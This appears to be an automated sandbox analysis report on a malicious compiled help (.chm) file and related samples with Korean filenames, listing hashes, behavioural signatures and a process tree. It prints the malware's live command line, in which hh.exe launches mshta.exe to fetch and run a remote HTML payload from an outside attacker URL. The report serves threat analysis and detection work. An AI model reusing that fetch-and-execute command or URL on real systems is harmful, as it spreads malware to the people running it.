Analysis
max time kernel: 146s
max time network: 149s
platform: windows7_x64
resource: win7-20230220-en
resource tags: arch:x64, arch:x86, image:win7-20230220-en, locale:en-us, os:windows7-x64, system
submitted: 21-03-2023 23:17
Behavioral tasks
behavioral1: sample "(20220120)2022 - 001.chm", resource win7-20230220-en
behavioral2: sample "(20220120)2022 - 001.chm", resource win10v2004-20230220-en
behavioral3: sample "(์์) ์ 20๋ ๋ํต๋ น ์ทจ์์ ์ฌ์ธ๋ํฌ ์ฐธ์์ ์ถ์ฒ ๋ช ๋จ(๊ตญ๋ฏผ์ํ๋น์ 000).chm", resource win7-20230220-en
behavioral4: sample "(์์) ์ 20๋ ๋ํต๋ น ์ทจ์์ ์ฌ์ธ๋ํฌ ์ฐธ์์ ์ถ์ฒ ๋ช ๋จ(๊ตญ๋ฏผ์ํ๋น์ 000).chm", resource win10v2004-20230221-en
behavioral5: sample "(์์) ์ 20๋ ๋ํต๋ น ์ทจ์์ ์ฌ์ธ๋ํฌ ์ฐธ์์ ์ถ์ฒ ๋ช ๋จ(๊ตญ๋ฏผ์ํ๋น์ 000).xls", resource win7-20230220-en
behavioral6: sample "(์์) ์ 20๋ ๋ํต๋ น ์ทจ์์ ์ฌ์ธ๋ํฌ ์ฐธ์์ ์ถ์ฒ ๋ช ๋จ(๊ตญ๋ฏผ์ํ๋น์ 000).xls", resource win10v2004-20230220-en
(The Korean sample name in behavioral3 to behavioral6 is mis-encoded in the extracted report and is kept as it appears.)
General
Target: (20220120)2022 - 001.chm
Size: 331KB
MD5: 914521cb6b4846b2c0e85588d5224ba2
SHA1: 9171d8b916637bd4b1b4348c1744d8f25a2363c6
SHA256: a88dc9a152cc7758a1df5aa33cf7b31cdb14e593a8744f2059602a49b8b04e0f
SHA512: cfc3f84a08213f8a1883f0ca6164067e4dfa59d8655e0c2f0fcba0bf985555bb0dca00b5eae0bfaa9ad6861736e9dfe57af490faeb53553d60c460a51d3233c8
SSDEEP: 6144:tWVDblCou9OdcHSgSLaCjPjjaZL4annWryMGfdnSavw/5q/Rhc/UVkRJU1yq9i8y:uM3W0jSL3n4F5nlLW+ye/y
Malware Config
Extracted
http://attiferstudio.com/install.bak/sony/10.html
Signatures
Blocklisted process makes network request (1 IoC)
  flow 4, pid 516, process mshta.exe
Modifies Internet Explorer settings (2 IoCs; heading missing from the extracted report, inferred from the process-tree entries below)
  Key created: \REGISTRY\USER\S-1-5-21-3948302646-268491222-1934009652-1000\Software\Microsoft\Internet Explorer\Main, process hh.exe
  Key created: \REGISTRY\USER\S-1-5-21-3948302646-268491222-1934009652-1000\Software\Microsoft\Internet Explorer\Main, process mshta.exe
Suspicious use of SetWindowsHookEx (2 IoCs)
  pid 2016, process hh.exe
  pid 2016, process hh.exe
Suspicious use of WriteProcessMemory (3 IoCs)
  PID 2016 wrote to memory of 516: pid 2016, process hh.exe, target process mshta.exe
  PID 2016 wrote to memory of 516: pid 2016, process hh.exe, target process mshta.exe
  PID 2016 wrote to memory of 516: pid 2016, process hh.exe, target process mshta.exe
Processes
1. C:\Windows\hh.exe
   command line: "C:\Windows\hh.exe" "C:\Users\Admin\AppData\Local\Temp\(20220120)2022 - 001.chm"
   - Modifies Internet Explorer settings
   - Suspicious use of SetWindowsHookEx
   - Suspicious use of WriteProcessMemory
   2. C:\Windows\System32\mshta.exe (child of hh.exe)
      command line: "C:\Windows\System32\mshta.exe" http://attiferstudio.com/install.bak/sony/10.html ,
      - Blocklisted process makes network request
      - Modifies Internet Explorer settings
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
memory/2016-74-0x000007FFFFF90000-0x000007FFFFFA0000-memory.dmp (filesize 64KB)